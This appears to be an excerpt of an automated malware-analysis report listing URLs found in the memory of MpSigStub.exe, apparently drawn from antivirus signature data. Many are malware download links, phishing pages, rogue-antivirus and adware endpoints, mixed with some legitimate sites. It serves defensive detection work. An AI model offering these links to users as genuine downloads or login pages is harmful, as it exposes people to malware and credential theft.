Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://ubercancellationfeelawsuit.com/p.png
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://unifscon.com/RemAp.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp	String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://uploader.sx/uploads/2018/5b9ed5bc.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://urlz.fr/6zdb
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://usd.881515.net/down/1.exe
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://users.cpadown.com/ktv/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://uxos.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://vidalaviva.com/
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://vidscentral.net/inc/6348852
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://vip9646.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://vipasotka.com/in.php?adv=5052&val=2b1f4af0
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://vnz2107.ru
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://voesttalpine.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	String found in binary or memory: http://w.nanweng.cn/qy/gl
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: http://webspyshield.com/a/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://webye163.cn/hz
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://wermeer.cn/wermeer/report.php?title=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://westcost0.altervista.org/w/api2.php?a=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://western.net.pk
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://westernpinesbelize.com/lmb/login%20pdf.html
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://wetnosesandwhiskers.com/driverfix30e45vers.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://wevx.xyz/post.php?uid=
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://wgdteam.jconserv.net
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyip.com/automation/n09230945.asp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://whenyouplaygood.com/s/gate.php?a
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://whoisthis.100webspace.net/a.php?post=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://wifc.website/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://willy.pro.br/download
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://win-eto.com/hp.htm
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://win32.x10host.com/
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://winbutler.com/a.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://windowstation.bar/opzi0na1la.dll
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp	String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://work-helper.com/files/client/OffersWizard.exex
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://workwear.shoppages.eu/tools/adobe.ph)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://worldnit.com/ofi.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://wpitcher.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://wpr.mko.waw.pl/uploads/scheduler.txt
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://wsdygreenkegheedahatakankeadeshnaa30gas.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net//adv//
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net/adv/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://wwsw.friendgreeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www-afc.chrom3.net/images/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://www.19620425.com/download_adv/file.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com/?kmmy/f
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com/?kmmy/fregadd
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.31334.info/1stemail.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.37db.cn/images/dis.htmwidth=0height=0
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.4shared.com/download/-u-Zcvyfce/SkyLinev5.exe
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.4shared.com/download/TZDZz2RBba/aTubeWD9.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.52xdy.com
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.5qbb.com
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://www.77169.net/
